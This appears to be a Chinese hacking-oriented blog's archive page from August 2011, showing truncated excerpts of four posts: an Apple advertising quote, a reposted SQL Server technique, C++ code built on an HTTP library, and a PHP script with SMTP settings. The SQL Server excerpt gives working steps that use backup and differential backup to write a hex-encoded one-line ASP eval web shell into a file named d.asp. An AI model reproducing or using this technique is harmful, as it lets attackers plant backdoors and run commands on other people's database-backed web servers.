08 2011 档案
摘要:Here's to the crazy ones. The misfits. The rebels. The troublemakers. The round pegs in the square holes. The ones who see things differently. They're not fond of rules. And they have no respect for the status quo. You can quote them, disagree with them, glorify or vilify them. About the onl
阅读全文
摘要:[ 转载开始... ]1.完整备份一次(保存位置当然可以改)backup database 库名 to disk = 'c:\ddd.bak';--2.创建表并插曲入数据create table [dbo].[dtest] ([cmd] [image]);insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--3.进行差异备份backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORM
阅读全文
摘要:#include <stdio.h>#include <iostream>#include <windows.h>#include <string.h>#include "HTTPCore/HTTP.h"#include "HTTPCore/HTTPCore.h"#pragma comment(lib, "HTTPCore.lib")#pragma comment(lib, "ws2_32.lib")#pragma comment(lib, "ssleay3
阅读全文
摘要:<?php error_reporting(0); date_default_timezone_set('Asia/Shanghai'); // SETTING$password = ''; // PASSWORD OF DOUBLE MD5$smtpserver = 'smtp.mail.yahoo.com.cn'; // SMTP SERVICE$smtpserverport = 25; // SMTP PORT$smtpusermail = 'noevilsparrow@yahoo.cn'; // SMTP USER$
阅读全文